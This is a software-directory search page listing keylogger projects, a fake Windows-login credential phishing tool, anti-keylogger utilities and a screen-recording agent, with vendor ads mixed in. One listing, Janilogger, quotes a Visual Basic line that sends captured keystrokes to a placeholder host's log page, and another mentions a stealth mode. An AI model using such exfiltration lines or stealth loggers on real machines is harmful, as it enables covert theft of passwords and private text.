Showing 9 open source projects for "text-to-video"

View related business solutions
  • SKUDONET Open Source Load Balancer Icon
    SKUDONET Open Source Load Balancer

    Take advantage of Open Source Load Balancer to elevate your business security and IT infrastructure with a custom ADC Solution.

    SKUDONET ADC, operates at the application layer, efficiently distributing network load and application load across multiple servers. This not only enhances the performance of your application but also ensures that your web servers can handle more traffic seamlessly.
  • Top-Rated Free CRM Software Icon
    Top-Rated Free CRM Software

    216,000+ customers in over 135 countries grow their businesses with HubSpot

    HubSpot is an AI-powered customer platform with all the software, integrations, and resources you need to connect your marketing, sales, and customer service. HubSpot's connected platform enables you to grow your business faster by focusing on what matters most: your customers.
  • 1

    Winhook Keylogger

    Windows Hook Keylogger

    The Internet is full of such stuff. So why not introduce to you another one? Go! This is another example of using Win32 API functions to hook some system messages. Just run it once to start listening to the keyboard and clipboard and writing all content into a text log file. Recording will stop the second time you execute it. The author promises that this keylogger has no undeclared functions and is not a malicious program. It is intended for educational use and not for collecting sensitive...
    Downloads: 4 This Week
    Last Update:
    See Project
  • 2
    ...) This software can prevent some elementary,basic , keyloggers from stealing our passwords and/or usernames since the text values can be written with a virtual text box and the value thus produced is passed “via javascript” to the text box of the web page thus skipping the keyboard stream that could be intercepted . The software is under the New BSD license . The current version is an 'alpha.( https://en.wikipedia.org/wiki/Software_release_life_cycle)
    Downloads: 2 This Week
    Last Update:
    See Project
  • 3

    GATE_For_PM

    Protect the master passwords of password managers from exposure.

    Password managers only solve part of the password problem [ too many passwords to remember ], but leave the other important part unsolved [ user pin exposure during login : peek over the shoulder / keylogger / video camera ], if you rely on password managers for first part of the problem, they might come back and bite you big time for the 2nd part of the problem, because once your master password is exposed [ by keylogger / hidden camera ], all your passwords will be stolen. Hackers will enjoy...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 4
    A USLESS KEYLOGGER |MZL

    A USLESS KEYLOGGER |MZL

    A keylogger that save your data with yourself and works

    A keylogger that save your data with yourself and works as backup of every text you write
    Downloads: 0 This Week
    Last Update:
    See Project
  • Run applications fast and securely in a fully managed environment Icon
    Run applications fast and securely in a fully managed environment

    Cloud Run is a fully-managed compute platform that lets you run your code in a container directly on top of Google's scalable infrastructure.

    Run frontend and backend services, batch jobs, deploy websites and applications, and queue processing workloads without the need to manage infrastructure.
  • 5
    Shell Keylogger

    Shell Keylogger

    Quick, simple, terminal inspired keylog tool for beginners

    Very basic, easy to read, easy to use keylogger tool. Developed for education purposes, and runs on the terminal. Includes option to run in stealth mode
    Downloads: 0 This Week
    Last Update:
    See Project
  • 6

    Windows Domain Credentials Phishing Tool

    Video: https://vimeo.com/89782344

    While performing a Pen test for a client i needed to catch a domain user name and password, there are several ways to gain users passwords and it really depends on a lot of factors on how to get it in my case i didn't had time to wait for the user to enter his credentials and get it using a key logger so I and @Roni_Bachar created a fake windows domain login window to tried to force and trick the user to enter his password. There are several tools and techniques such as "Mimikatz" but they...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 7

    ICRON's Keyloger

    Version one of ICRON's Basic Keylogger

    This is just an extremely basic key-logger.The source code is up so have fun. This key-logger stores it's logs inside of a text file known as Logs.txt. Later versions will contain a couple perks. I will release them in the coming weeks. This is for educational purposes only. I do not condone any nefarious uses for said keylogger. DO NOT USE ON ANY SYSTEM THAT IS NOT YOUR OWN. Also you must inform all users of said computer (if their are multiple accounts) that you will be using said program. I...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 8
    Janilogger

    Janilogger

    Visual Basic based keylogger program

    Janilogger collects keystrokes to a textbox. And send the collected data to website panel. The asp file send datas to database. For example: You uploaded your log.asp to x.com . Janilogger sends datas to your database via log.asp with this command Webbrowser1.Navigate("http://www.x.com/log.asp?yaz=text1.text") -Log.asp included in source files
    Downloads: 0 This Week
    Last Update:
    See Project
  • 9
    pyshot-client
    pyshot-client is an agent installed on recorded machines.
    Downloads: 0 This Week
    Last Update:
    See Project
  • AI-based, Comprehensive Service Management for Businesses and IT Providers Icon
    AI-based, Comprehensive Service Management for Businesses and IT Providers

    Modular solutions for change management, asset management and more

    ChangeGear provides IT staff with the functions required to manage everything from ticketing to incident, change and asset management and more. ChangeGear includes a virtual agent, self-service portals and AI-based features to support analyst and end user productivity.
  • Previous
  • You're on page 1
  • Next